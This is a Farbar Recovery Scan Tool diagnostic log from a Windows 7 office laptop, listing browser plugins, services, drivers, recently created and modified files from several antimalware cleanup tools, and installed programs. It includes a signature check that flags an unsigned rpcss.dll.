FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nplv2011win32.dll (National Instruments)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nplv2012win32.dll (National Instruments)
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-02-20]
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird
FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2013-03-15]

Chrome:
=======

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 c2wts; C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [15768 2010-02-02] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2436280 2014-09-25] (Microsoft Corporation)
R2 CrmSqlStartupSvc; C:\Program Files (x86)\Microsoft Dynamics CRM\Client\bin\CrmSqlStartupSvc.exe [23400 2012-01-16] (Microsoft Corporation)
R2 DcomLaunch; C:\Windows\system32\rpcss.dll [524288 2014-06-03] (Microsoft Corporation) [File not signed]
S3 EhttpSrv; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [42360 2010-08-12] (ESET)
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [810144 2010-08-12] (ESET)
R2 EmbassyService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [225720 2012-11-20] ()
R2 L4301_Solar; C:\Program Files\Logitech\SolarApp\L4301_Solar.exe [405744 2013-01-30] (Logitech, Inc.)
R2 LkCitadelServer; C:\Windows\SysWOW64\lkcitdl.exe [695136 2010-10-27] (National Instruments, Inc.)
R2 lkClassAds; C:\Windows\SysWOW64\lkads.exe [50328 2012-11-28] (National Instruments Corporation)
R2 lkTimeSync; C:\Windows\SysWOW64\lktsrv.exe [60568 2012-11-28] (National Instruments Corporation)
R2 msoidsvc; C:\Program Files\Common Files\Microsoft Shared\Microsoft Online Services\MSOIDSVC.EXE [2060192 2011-04-28] (Microsoft Corp.)
R2 mxssvr; C:\Program Files (x86)\National Instruments\MAX\nimxs.exe [51360 2012-11-21] (National Instruments Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [272688 2012-08-23] ()
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-01-18] (Hewlett-Packard) [File not signed]
R2 NIApplicationWebServer; C:\Program Files (x86)\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe [54472 2012-11-30] (National Instruments Corporation)
S4 NIApplicationWebServer64; C:\Program Files\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe [76488 2012-11-30] (National Instruments Corporation)
R2 NIDomainService; C:\Program Files (x86)\National Instruments\Shared\Security\nidmsrv.exe [371352 2012-11-28] (National Instruments Corporation)
S3 NILM License Manager; C:\Program Files (x86)\National Instruments\Shared\License Manager\Bin\lmgrd.exe [1427688 2010-08-02] (Macrovision Corporation)
R2 nimDNSResponder; C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe [258776 2012-09-26] (National Instruments Corporation)
R2 NINetworkDiscovery; C:\Program Files (x86)\National Instruments\Shared\NI Network Discovery\niDiscSvc.exe [172344 2012-12-18] (National Instruments Corporation)
R2 niSvcLoc; C:\Program Files (x86)\National Instruments\Shared\NI WebServer\SystemWebServer.exe [54464 2012-11-30] (National Instruments Corporation)
R2 NITaggerService; C:\Program Files (x86)\National Instruments\Shared\Tagger\tagsrv.exe [680624 2012-06-07] (National Instruments Corporation)
R2 O2FLASH; C:\Windows\system32\o2flash.exe [244328 2011-11-16] (O2Micro International)
R2 PbaDrvSvc_x64; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\hapi64\pbadrvsvc.exe [20480 2012-11-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-01-18] (Hewlett-Packard) [File not signed]
R2 RpcSs; C:\Windows\system32\rpcss.dll [524288 2014-06-03] (Microsoft Corporation) [File not signed]
S2 tcsd_win32.exe; C:\Program Files (x86)\Security Innovation\SI TSS\bin\tcsd_win32.exe [1643520 2012-05-11] () [File not signed]
R2 Wave Authentication Manager Service; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe [1758720 2012-11-19] (Wave Systems Corp.) [File not signed]
S2 WvPCR; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [254384 2012-11-08] (Wave Systems Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3342640 2012-08-23] (Intel® Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R3 dcdbas; C:\Windows\System32\DRIVERS\dcdbas64.sys [39016 2012-09-23] (Dell Inc.)
R2 DgiVecp; C:\Windows\system32\Drivers\DgiVecp.sys [53816 2010-01-21] (Samsung Electronics Co., Ltd.)
R2 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [168544 2010-07-29] (ESET)
R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [141264 2010-07-29] (ESET)
R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [126320 2010-07-29] (ESET)
R1 nvkflt; C:\Windows\System32\DRIVERS\nvkflt.sys [300320 2013-12-04] (NVIDIA Corporation)
R3 ST_ACCEL; C:\Windows\System32\DRIVERS\ST_ACCEL.sys [68208 2012-05-21] (STMicroelectronics)
R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [47072 2012-10-09] (Windows ® Win 7 DDK provider)
S3 wbfcvusbdrv; C:\Windows\System32\Drivers\wbfcvusbdrv.sys [16008 2012-10-24] ()
R3 XHCIPort; C:\Windows\System32\DRIVERS\XHCIPort.sys [188896 2012-10-09] (Windows ® Win 7 DDK provider)
S3 KAPFA; \??\C:\Windows\system32\drivers\KAPFA.SYS [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-04 10:01 - 2014-11-04 10:01 - 00024053 _____ () C:\Users\rbecker\Desktop\FRST.txt
2014-11-04 09:54 - 2014-11-04 09:59 - 02114560 _____ (Farbar) C:\Users\rbecker\Desktop\FRST64.exe
2014-11-04 09:29 - 2014-11-04 09:29 - 00004035 _____ () C:\Users\bcostello\Desktop\RKreport_SCN_11042014_092846.log
2014-11-04 09:23 - 2014-11-04 09:25 - 00037624 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-11-04 09:23 - 2014-11-04 09:23 - 17526360 _____ () C:\Users\bcostello\Desktop\RogueKillerX64.exe
2014-11-04 09:23 - 2014-11-04 09:23 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-11-04 09:20 - 2014-11-04 09:20 - 00001471 _____ () C:\Users\bcostello\Desktop\mbamreport.txt
2014-11-04 09:10 - 2014-11-04 09:10 - 00001104 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-11-04 09:09 - 2014-11-04 09:09 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\bcostello\Downloads\mbam-setup-2.0.3.1025.exe
2014-11-03 16:44 - 2014-11-03 16:44 - 00046148 _____ () C:\Users\bcostello\Desktop\Addition.txt
2014-11-03 16:44 - 2014-11-03 16:44 - 00036389 _____ () C:\Users\bcostello\Desktop\FRST.txt
2014-11-03 16:42 - 2014-11-03 16:42 - 02114560 _____ (Farbar) C:\Users\bcostello\Downloads\FRST64(1).exe
2014-11-03 16:41 - 2014-11-03 16:41 - 02114560 _____ (Farbar) C:\Users\bcostello\Desktop\FRST64.exe
2014-11-03 16:41 - 2014-11-03 16:41 - 00000000 ____D () C:\Users\bcostello\AppData\Local\Macromedia
2014-11-03 15:54 - 2014-11-03 15:54 - 02347384 _____ (ESET) C:\Users\bcostello\Downloads\esetsmartinstaller_enu(1).exe
2014-11-03 15:35 - 2014-11-03 15:35 - 02347384 _____ (ESET) C:\Users\bcostello\Downloads\esetsmartinstaller_enu.exe
2014-11-03 15:35 - 2014-11-03 15:35 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-11-03 15:13 - 2014-11-04 09:09 - 00003056 _____ () C:\Windows\System32\Tasks\Defrag
2014-11-03 15:13 - 2014-11-04 09:09 - 00000232 _____ () C:\Windows\Tasks\Defrag.job
2014-11-03 14:49 - 2014-11-03 14:49 - 00030010 _____ () C:\ComboFix.txt
2014-11-03 14:41 - 2014-11-03 14:50 - 00000000 ____D () C:\ComboFix
2014-11-03 14:41 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-11-03 14:41 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-11-03 14:41 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-11-03 14:41 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-11-03 14:40 - 2014-11-03 14:50 - 00000000 ____D () C:\Qoobox
2014-11-03 14:40 - 2014-11-03 14:48 - 00000000 ____D () C:\Windows\erdnt
2014-11-03 14:25 - 2014-11-03 14:25 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Macromedia
2014-11-03 14:12 - 2014-11-03 14:12 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\WinRAR
2014-11-03 14:00 - 2014-11-03 14:48 - 00000000 ____D () C:\Windows\SysWOW64\NV
2014-11-03 14:00 - 2014-11-03 14:48 - 00000000 ____D () C:\Windows\system32\NV
2014-10-31 12:22 - 2014-11-04 09:45 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-31 12:22 - 2014-11-04 09:10 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-31 12:22 - 2014-11-04 09:10 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-31 12:22 - 2014-10-31 12:22 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-31 12:22 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-31 12:22 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-31 12:22 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-31 12:21 - 2014-10-31 12:21 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\rbecker\Downloads\mbam-setup-2.0.3.1025.exe
2014-10-31 09:13 - 2014-10-31 09:13 - 00001161 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2014-10-31 09:13 - 2014-10-31 09:13 - 00000000 ____D () C:\ProgramData\Mozilla
2014-10-31 09:13 - 2014-10-31 09:13 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-10-31 09:12 - 2014-10-31 09:12 - 00244032 _____ () C:\Users\rbecker\Downloads\Firefox Setup Stub 33.0.2.exe
2014-10-31 09:09 - 2014-10-31 09:13 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Mozilla
2014-10-31 09:09 - 2014-10-31 09:09 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Mozilla
2014-10-31 09:09 - 2014-10-31 09:09 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Macromedia
2014-10-22 07:49 - 2014-10-22 07:49 - 00002345 _____ () C:\Users\rbecker\Desktop\OneNote 2013.lnk
2014-10-22 07:48 - 2014-10-22 07:48 - 00002403 _____ () C:\Users\rbecker\Desktop\Word 2013.lnk
2014-10-22 07:48 - 2014-10-22 07:48 - 00002402 _____ () C:\Users\rbecker\Desktop\PowerPoint 2013.lnk
2014-10-22 07:48 - 2014-10-22 07:48 - 00002366 _____ () C:\Users\rbecker\Desktop\Access 2013.lnk
2014-10-22 07:46 - 2014-10-22 07:46 - 00002365 _____ () C:\Users\rbecker\Desktop\Excel 2013.lnk
2014-10-22 07:46 - 2014-10-22 07:46 - 00002359 _____ () C:\Users\rbecker\Desktop\Outlook 2013.lnk
2014-10-22 07:36 - 2014-10-22 07:36 - 00000000 ____D () C:\Users\rbecker\AppData\Local\VirtualStore
2014-10-21 13:26 - 2014-10-21 13:26 - 00000000 ____D () C:\Users\rbecker\Documents\OneNote Notebooks
2014-10-21 11:43 - 2014-10-21 11:43 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Macromedia
2014-10-21 11:11 - 2014-10-21 11:11 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Apple
2014-10-21 11:09 - 2014-10-21 11:09 - 00000000 ___RD () C:\MSOCache
2014-10-21 11:03 - 2014-10-21 11:03 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Apple Computer
2014-10-21 11:00 - 2014-10-21 12:35 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Adobe
2014-10-21 11:00 - 2014-10-21 12:34 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Adobe
2014-10-21 11:00 - 2014-10-21 11:00 - 00112248 _____ () C:\Users\rbecker\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-21 11:00 - 2014-10-21 11:00 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Creative
2014-10-21 11:00 - 2014-10-21 11:00 - 00000000 ____D () C:\Users\rbecker\AppData\Local\National Instruments
2014-10-21 10:59 - 2014-10-21 10:59 - 00001411 _____ () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-21 10:58 - 2014-11-04 09:01 - 00003856 __RSH () C:\Users\rbecker\ntuser.pol
2014-10-21 10:58 - 2014-11-04 09:01 - 00000000 ____D () C:\Users\rbecker
2014-10-21 10:58 - 2014-10-21 10:59 - 00001445 _____ () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-21 10:58 - 2014-10-21 10:58 - 00000020 ___SH () C:\Users\rbecker\ntuser.ini
2014-10-21 10:58 - 2014-10-21 10:58 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Intel
2014-10-21 10:58 - 2013-03-14 10:42 - 00002102 _____ () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft SkyDrive.lnk
2014-10-21 10:58 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-21 10:58 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-21 10:49 - 2014-11-03 15:35 - 00000000 ____D () C:\Users\bcostello\AppData\Local\Mozilla
2014-10-21 10:49 - 2014-10-21 10:49 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Mozilla
2014-10-20 13:53 - 2014-10-20 13:53 - 00012872 _____ (SurfRight B.V.) C:\Windows\SysWOW64\bootdelete.exe
2014-10-20 13:53 - 2014-10-20 13:53 - 00000190 _____ () C:\Windows\SysWOW64\bootdelete.lst
2014-10-20 13:52 - 2014-10-31 09:06 - 00030616 _____ () C:\Windows\SysWOW64\Drivers\hitmanpro37.sys
2014-10-20 13:49 - 2014-10-20 13:49 - 00000000 ____D () C:\Program Files\HitmanPro
2014-10-20 13:46 - 2014-10-20 13:46 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-20 13:46 - 2014-10-20 13:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2014-10-20 13:46 - 2014-10-20 13:46 - 00000000 ____D () C:\Program Files\WinRAR
2014-10-20 13:33 - 2014-10-20 13:53 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-10-17 15:11 - 2014-11-04 10:01 - 00000000 ____D () C:\FRST
2014-10-17 11:41 - 2014-11-03 14:25 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Adobe
2014-10-17 11:41 - 2014-10-17 11:41 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Creative
2014-10-17 11:41 - 2014-10-17 11:41 - 00000000 ____D () C:\Users\bcostello\AppData\Local\National Instruments
2014-10-17 11:41 - 2014-10-17 11:41 - 00000000 ____D () C:\Users\bcostello\AppData\Local\Adobe
2014-10-17 11:40 - 2014-10-17 11:40 - 00001411 _____ () C:\Users\bcostello\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-17 11:39 - 2014-10-17 11:40 - 00001445 _____ () C:\Users\bcostello\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-17 11:39 - 2014-10-17 11:39 - 00002558 __RSH () C:\Users\bcostello\ntuser.pol
2014-10-17 11:39 - 2014-10-17 11:39 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Intel
2014-10-17 11:39 - 2014-10-17 11:39 - 00000000 ____D () C:\Users\bcostello\AppData\Local\VirtualStore
2014-10-17 10:38 - 2014-10-17 10:38 - 00000000 ____D () C:\Users\bcostello\Documents\Audible
2014-10-17 10:36 - 2014-10-17 10:36 - 00000000 ____D () C:\Windows\pss

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-04 10:00 - 2014-10-01 10:43 - 00005014 _____ () C:\Windows\System32\Tasks\WSCEAA
2014-11-04 09:43 - 2013-03-14 10:17 - 00000112 _____ () C:\Windows\system32\config\netlogon.ftl
2014-11-04 09:15 - 2009-07-13 23:45 - 00021312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-04 09:15 - 2009-07-13 23:45 - 00021312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-04 09:12 - 2013-02-20 15:12 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-04 09:12 - 2009-07-14 00:13 - 00785022 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-04 09:09 - 2013-03-14 10:18 - 00017315 __RSH () C:\ProgramData\ntuser.pol
2014-11-04 09:08 - 2014-01-09 08:58 - 00041891 _____ () C:\Windows\setupact.log
2014-11-04 09:08 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-04 09:07 - 2013-02-20 15:12 - 01748052 _____ () C:\Windows\WindowsUpdate.log
2014-11-04 09:02 - 2013-09-10 09:03 - 00004978 _____ () C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for {3cb986d6-91c6-4e57-9f69-11185dadd832} ADC69.adc.com
2014-11-03 17:33 - 2013-09-12 09:26 - 00000072 _____ () C:\Users\Public\LMDebug.log
2014-11-03 15:10 - 2014-01-10 08:55 - 00449262 _____ () C:\Windows\PFRO.log
2014-11-03 14:50 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Default
2014-11-03 14:48 - 2009-07-13 21:34 - 00000215 _____ () C:\Windows\system.ini
2014-11-03 14:47 - 2009-07-13 21:34 - 92012544 _____ () C:\Windows\system32\config\SOFTWARE.bak
2014-11-03 14:47 - 2009-07-13 21:34 - 19136512 _____ () C:\Windows\system32\config\SYSTEM.bak
2014-11-03 14:47 - 2009-07-13 21:34 - 01048576 _____ () C:\Windows\system32\config\DEFAULT.bak
2014-11-03 14:47 - 2009-07-13 21:34 - 00262144 _____ () C:\Windows\system32\config\SECURITY.bak
2014-11-03 13:51 - 2009-07-13 21:34 - 00262144 _____ () C:\Windows\system32\config\SAM.bak
2014-11-02 07:41 - 2013-10-23 16:10 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-31 09:13 - 2013-10-23 16:10 - 00001149 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk
2014-10-23 14:33 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Public\Libraries
2014-10-22 07:36 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD
2014-10-21 09:38 - 2013-03-14 10:40 - 00000000 ____D () C:\Program Files\Microsoft Office 15
2014-10-21 09:11 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-17 11:39 - 2014-08-14 08:05 - 00000000 ____D () C:\Users\bcostello
2014-10-15 10:35 - 2014-09-09 19:05 - 00000000 ____D () C:\FTC
2014-10-15 09:56 - 2013-04-09 14:09 - 00000020 ____H () C:\ProgramData\PKP_DLet.DAT
2014-10-06 07:57 - 2009-07-14 00:08 - 00032612 _____ () C:\Windows\Tasks\SCHEDLGU.TXT

Files to move or delete:
====================
C:\Users\kmitchell\CrmClientSetup.exe
C:\Users\kmitchell\msvcp100.dll
C:\Users\kmitchell\msvcr100.dll


Some content of TEMP:
====================
C:\Users\bcostello\AppData\Local\Temp\dllnt_dump.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll
[2010-11-20 22:24] - [2014-06-03 08:23] - 0524288 ____A (Microsoft Corporation) 6223F47AFA5D9C1ECB5AFD088BD19618

 ATTENTION ======> If the system is having audio adware rpcss.dll is patched. Google the MD5, if the MD5 is unique the file is infected.
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-10-29 11:59

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 04-11-2014
Ran by bcostello at 2014-11-04 10:01:38
Running from C:\Users\rbecker\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: ESET NOD32 Antivirus 4.2 (Enabled - Up to date) {77DEAFED-8149-104B-25A1-21771CA47CD1}
AS: ESET NOD32 Antivirus 4.2 (Enabled - Up to date) {CCBF4E09-A773-1FC5-1F11-1A056723366C}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 7.2.4 - Hewlett-Packard) Hidden
Adobe Acrobat X Standard - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-BA7E-000000000005}) (Version: 10.1.7 - Adobe Systems)
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{45C56AA7-ED1B-4800-A97F-EDDF3F3520B1}) (Version: 2.3.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{2F72F540-1F60-4266-9506-952B21D6640D}) (Version: 6.1.0.13 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Custom (Version: 01.00.00.002 - Wave Systems Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell 1135n Laser MFP (HKLM-x32\...\Dell 1135n Laser MFP) (Version:  - DELL Inc.)
Dell ControlVault Host Components Installer 64 bit (Version: 2.3.24.1437 - Broadcom Corporation) Hidden
Dell Data Protection | Access (HKLM\...\{ABBA2EA4-740E-4052-902B-9CA70B081E3F}) (Version: 2.3.00001.021 - Dell Inc.)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 8.1200.101.116 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 1.40.54 - Creative Technology Ltd)
DellAccess (Version: 01.03.00.046 - Wave Systems Corp.) Hidden
Dexterity Shared Components 12.0 (64-bit) (HKLM\...\{E56D868E-684F-4586-AF90-9F46DAC569A2}) (Version: 12.00.0270.000 - Microsoft Corporation)
EMBASSY Client Core (Version: 01.03.00.092 - Wave Systems Corp.) Hidden
ERAS Connector (Version: 02.09.05.0330 - Wave Systems Corp) Hidden
ESET NOD32 Antivirus (HKLM\...\{C5F268F1-0856-43E2-B6F1-2470EEE48D2A}) (Version: 4.2.64.12 - ESET, spol. s r.o.)
ESET Online Scanner v3 (HKLM-x32\...\ESET Online Scanner) (Version:  - )
Gemalto (Version: 01.64.01.0010 - Wave Systems Corp) Hidden
GemPcCCID (Version: 2.0.1 - Gemalto) Hidden
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.232 - SurfRight B.V.)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Network Connections 16.8.45.00 (HKLM\...\PROSetDX) (Version: 16.8.45.00 - Dell)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2639 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 1.0.6.245 - Intel Corporation)
Intel® WiDi (HKLM\...\{6097158B-0184-4140-BEC3-7885794D2571}) (Version: 3.5.40.0 - Intel Corporation)
Intel® Wireless Display (HKLM\...\{28EF7372-9087-4AC3-9B9F-D9751FCDF830}) (Version:  - )
Intel® PROSet/Wireless WiFi Software (HKLM\...\{ECE5B218-A086-4E18-A362-D11181681457}) (Version: 15.03.1000.1637 - Intel Corporation)
iTunes (HKLM\...\{0225AD21-F3E2-4916-BFF3-65D3F9052582}) (Version: 11.0.2.26 - Apple Inc.)
